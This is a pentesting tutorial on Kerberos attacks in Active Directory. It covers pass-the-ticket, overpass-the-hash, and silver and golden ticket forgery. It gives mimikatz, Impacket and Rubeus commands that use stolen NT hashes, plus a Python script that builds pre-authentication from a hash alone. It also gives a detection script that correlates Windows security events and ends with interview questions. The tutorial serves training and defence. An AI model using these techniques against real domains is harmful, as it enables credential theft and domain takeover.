Pentesting Active Directory - Kerberos (Part 2)

Part 3 of a hopefully fruitful and long series

Now that we know how Kerberos works, we can move on to learning the various types of attacks. I will mainly discuss attacks related to Kerberos.

The types of attacks we will discuss today are:

  • Pass The Ticket

  • Overpass the Hash / Pass the Key

  • Silver Ticket

  • Golden Ticket

I will probably discuss more attacks in the next part.

Pass the Ticket

In a Pass the Ticket attack, the attacker steals a Kerberos ticket (a TGT or a service ticket) that was issued to a user and replays it to impersonate that user, gaining access to whatever resources and services the user can reach. A ticket captured on the wire via MITM is not enough on its own: to use a ticket, the client must also send an authenticator encrypted with the ticket's session key, and that key never travels in the clear. Dumping tickets from the lsass.exe process (for example with mimikatz `sekurlsa::tickets /export`, then `kerberos::ptt` to inject one into the current logon session) yields both the ticket and its session key, which is why that is the usual route.

Overpass the Hash / Pass the Key

Overpass the Hash (also called Pass the Key) is the Kerberos counterpart of Pass the Hash, so it still works where NTLM authentication is disabled and only Kerberos is accepted. It uses a user's NTLM hash or AES key to request Kerberos tickets: these values are precisely the long-term keys a Kerberos client derives from the password (the NT hash is the RC4-HMAC key, the AES keys are the AES etype keys), so the KDC cannot distinguish the request from a normal logon. The keys can be extracted from the SAM on a workstation, from the NTDS.DIT file on a domain controller, or from lsass.exe process memory with Mimikatz. With the key, the attacker requests a TGT and can then reach any service or machine the user is allowed to access. Impacket's getTGT.py does this; note that the NT hash goes after the colon in `-hashes LMHASH:NTHASH`, and the resulting ccache file must be exported in KRB5CCNAME before other Impacket tools will pick it up:

python getTGT.py greenhat.com/frost -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/isaac.ccache

On Windows, Rubeus can request the TGT directly from the RC4 key (add `/ptt` to inject the ticket into the current logon session):

.\Rubeus.exe asktgt /domain:greenhat.com /user:frost /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7
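The reason the hash alone is enough deserves a closer look. The following is an added example written for this page (it is not code from the page, from Impacket or from Rubeus) and uses only the Python standard library: it derives the NT hash exactly as MS-NLMP specifies (MD4 over the UTF-16LE password), uses that hash directly as the RC4-HMAC (etype 23) key per RFC 4757, and builds and verifies the PA-ENC-TIMESTAMP blob a client sends in its AS-REQ. MD4 and RC4 are implemented inline because OpenSSL 3 only ships MD4 in its legacy provider. The DER encoding of PA-ENC-TS-ENC is hand-rolled and omits the optional `pausec` field; the surrounding AS-REQ framing and the network exchange are not built here, and the password "Winter2024!" is a constructed demo value.

```python
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320), implemented here because OpenSSL 3 only ships it in the legacy provider."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (range(16), (3, 7, 11, 19), f, 0),
        ((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), g, 0x5A827999),
        ((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), h, 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for order, shifts, fn, const in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so each step updates "a"
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash (MS-NLMP): MD4 over the UTF-16LE password. For etype 23 this is the Kerberos key itself."""
    return md4(password.encode("utf-16le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


KU_AS_REQ_PA_ENC_TIMESTAMP = 1  # key usage number for PA-ENC-TIMESTAMP (RFC 4120 section 7.5.1)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = b"") -> bytes:
    """RFC 4757 section 3: output = HMAC-MD5 checksum || RC4(K3, confounder || plaintext)."""
    confounder = confounder or os.urandom(8)
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    cksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    return cksum + rc4(k3, confounder + plaintext)


def rc4_hmac_decrypt(key: bytes, usage: int, ciphertext: bytes) -> bytes:
    """Inverse of rc4_hmac_encrypt, as the KDC does it; raises if the key does not match."""
    cksum, body = ciphertext[:16], ciphertext[16:]
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    plain = rc4(k3, body)
    if not hmac.compare_digest(cksum, hmac.new(k1, plain, hashlib.md5).digest()):
        raise ValueError("integrity check failed: wrong key or tampered blob")
    return plain[8:]  # strip the 8-byte confounder


def pa_enc_ts_enc(kerberos_time: str) -> bytes:
    """Hand-rolled DER for PA-ENC-TS-ENC ::= SEQUENCE { patimestamp [0] KerberosTime }, pausec omitted."""
    gt = b"\x18" + bytes([len(kerberos_time)]) + kerberos_time.encode("ascii")  # GeneralizedTime
    ctx0 = b"\xa0" + bytes([len(gt)]) + gt                                       # [0] EXPLICIT
    return b"\x30" + bytes([len(ctx0)]) + ctx0                                   # SEQUENCE


def forge_preauth(nt_hash_hex: str, kerberos_time: str = "20240101120000Z") -> bytes:
    """Client side of overpass-the-hash: the pre-auth blob needs nothing but the NT hash."""
    return rc4_hmac_encrypt(bytes.fromhex(nt_hash_hex), KU_AS_REQ_PA_ENC_TIMESTAMP, pa_enc_ts_enc(kerberos_time))


def kdc_verify_preauth(stored_nt_hash_hex: str, blob: bytes) -> str:
    """KDC side: decrypt with the key stored for the account and return the timestamp it contains."""
    plain = rc4_hmac_decrypt(bytes.fromhex(stored_nt_hash_hex), KU_AS_REQ_PA_ENC_TIMESTAMP, blob)
    if plain[4] != 0x18:
        raise ValueError("expected a GeneralizedTime inside PA-ENC-TS-ENC")
    return plain[6:6 + plain[5]].decode("ascii")


if __name__ == "__main__":
    # Constructed demo: the attacker holds only the account's NT hash, never the password.
    stolen = nt_hash("Winter2024!").hex()
    print("KDC accepted timestamp:", kdc_verify_preauth(stolen, forge_preauth(stolen)))
```

Two things to take from this when answering the NTLM-versus-AES question: the RC4 key is the unsalted NT hash, so the same value works for Pass the Hash over NTLM and for Kerberos etype 23, while the AES keys are derived with a per-principal salt and exist only for Kerberos; and a request with etype 23 from an account that normally uses AES is visible in the 4768 event's TicketEncryptionType (0x17) and is a common detection for this technique.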

Silver Ticket

A Silver Ticket is a forged service ticket (TGS). Because a service ticket is encrypted with the long-term key of the account that runs the service, an attacker who has the NTLM hash (or AES key) of that account, e.g. a computer account for the services hosted on that machine, can forge a ticket for it without ever contacting the KDC. The service class in the SPN decides what the ticket is good for: CIFS for SMB shares, HOST plus RPCSS for WMI, HOST plus HTTP for PowerShell Remoting and WinRM, and so on. Two practical points: since the KDC is never involved, nothing about the access is logged on the domain controllers, only on the target host, and most services do not ask a DC to validate the PAC, so the group memberships written into the forged ticket are taken at face value; and the ticket stays usable until that account's password changes, which for computer accounts happens every 30 days by default.

Golden Ticket

A Golden Ticket is a forged TGT. Every TGT is encrypted with the key of the domain's krbtgt account, so an attacker who obtains the krbtgt NTLM hash (or AES key), normally by dumping it from a domain controller, can mint a TGT for any user, including accounts that do not exist, with any group memberships, and the KDC will accept it and issue service tickets for any service or machine in the domain as the impersonated user. Since the forging happens offline, the impersonated user's password and account state do not matter; the ticket only stops working once the krbtgt password has been reset twice, because the KDC keeps accepting tickets encrypted under the previous key.
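Both forged-ticket attacks leave a characteristic gap in the audit trail, which is what the detection question below is getting at. The following is an added example, not code from the page or from any of the tools it mentions: a small correlation over Windows Security events for the Silver Ticket and Golden Ticket sections together. The events are constructed samples, not real logs, but the event IDs and field names are the real ones (4768 TGT issued, 4769 service ticket requested, 4624 logon). A golden ticket is never issued by a DC, so the account's first trace is a 4769 with no 4768 on any DC; a silver ticket never reaches the KDC, so the target host logs a Kerberos network logon with no 4769 for that host on any DC. Mimikatz forges RC4 (0x17) tickets unless told otherwise, so 0x17 for an AES-capable account is a downgrade flag on its own. The assumptions are that logs from every DC are collected in one place, that Kerberos auditing is enabled, and that the events fall inside one TGT lifetime; the `GREENHAT.COM` realm, hosts, users and addresses are invented.

```python
from typing import Dict, List, Set, Tuple

Event = Dict[str, str]

# Constructed sample events from all DCs in the domain (assumption: DC logs are centralised).
DC_EVENTS: List[Event] = [
    {"EventID": "4768", "TargetUserName": "frost", "IpAddress": "10.0.0.20", "TicketEncryptionType": "0x12"},
    {"EventID": "4769", "TargetUserName": "frost@GREENHAT.COM", "ServiceName": "FILESRV$",
     "IpAddress": "10.0.0.20", "TicketEncryptionType": "0x12"},
    # administrator never received a 4768, yet presents a TGT to ask for a service ticket
    {"EventID": "4769", "TargetUserName": "administrator@GREENHAT.COM", "ServiceName": "FILESRV$",
     "IpAddress": "10.0.0.66", "TicketEncryptionType": "0x17"},
]

# Constructed sample events from the member server FILESRV's own Security log.
FILESRV_EVENTS: List[Event] = [
    {"EventID": "4624", "TargetUserName": "frost", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.20"},
    {"EventID": "4624", "TargetUserName": "administrator", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.66"},
    # svc_backup logs on with Kerberos although no DC ever issued it a ticket for FILESRV$
    {"EventID": "4624", "TargetUserName": "svc_backup", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.77"},
]

# Accounts that have AES keys (msDS-SupportedEncryptionTypes); RC4 for these is a downgrade.
AES_ACCOUNTS: Set[str] = {"frost", "administrator", "svc_backup"}


def _sam(name: str) -> str:
    """4769 logs user@REALM while 4768 and 4624 log the bare sAMAccountName; normalise both."""
    return name.split("@")[0].lower()


def golden_ticket_candidates(dc_events: List[Event], aes_accounts: Set[str]) -> List[Tuple[str, str, List[str]]]:
    """Flag TGS requests whose TGT no DC issued, plus RC4 tickets for AES-capable accounts."""
    tgt_issued_to = {_sam(e["TargetUserName"]) for e in dc_events if e["EventID"] == "4768"}
    findings = []
    for e in dc_events:
        if e["EventID"] != "4769":
            continue
        user, reasons = _sam(e["TargetUserName"]), []
        if user not in tgt_issued_to:
            reasons.append("4769 without any 4768: the TGT was not issued by a DC")
        if e["TicketEncryptionType"].lower() == "0x17" and user in aes_accounts:
            reasons.append("RC4 ticket for an AES-capable account (mimikatz default etype)")
        if reasons:
            findings.append((user, e["IpAddress"], reasons))
    return findings


def silver_ticket_candidates(host_events: List[Event], dc_events: List[Event], host_account: str) -> List[Tuple[str, str]]:
    """Flag Kerberos network logons on a host that no DC issued a service ticket for."""
    served = {_sam(e["TargetUserName"]) for e in dc_events
              if e["EventID"] == "4769" and e["ServiceName"].lower() == host_account.lower()}
    return [(_sam(e["TargetUserName"]), e["IpAddress"]) for e in host_events
            if e["EventID"] == "4624" and e["LogonType"] == "3"
            and e["AuthenticationPackageName"] == "Kerberos" and _sam(e["TargetUserName"]) not in served]


if __name__ == "__main__":
    for user, ip, why in golden_ticket_candidates(DC_EVENTS, AES_ACCOUNTS):
        print(f"golden ticket? {user} from {ip}: {'; '.join(why)}")
    for user, ip in silver_ticket_candidates(FILESRV_EVENTS, DC_EVENTS, "FILESRV$"):
        print(f"silver ticket? {user} from {ip}: Kerberos logon with no 4769 for FILESRV$")
```

These are hunting heuristics rather than proof: a missing 4768 can also mean a DC whose log was not collected or a TGT issued before the collection window started, so a production rule needs the TGT lifetime (10 hours by default) as its correlation window and all DCs in scope before it fires.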

Interview Question

  1. As an attacker, is it better to use the NTLM hash or AES Key of a user? Explain Why.

  2. Assuming that the user you created a TGT with changes its password, will your TGT still be valid? Explain why.

  3. What is the difference between a silver ticket and a golden ticket?

  4. How can you detect a golden ticket?

Author

Isaac

References

  • Kerberos (I): How does Kerberos work? - Theory
  • HackTricks - Pass the Ticket
  • HackTricks - Overpass the Hash
  • HackTricks - Silver Ticket
  • HackTricks - Golden Ticket

Last updated 12 months ago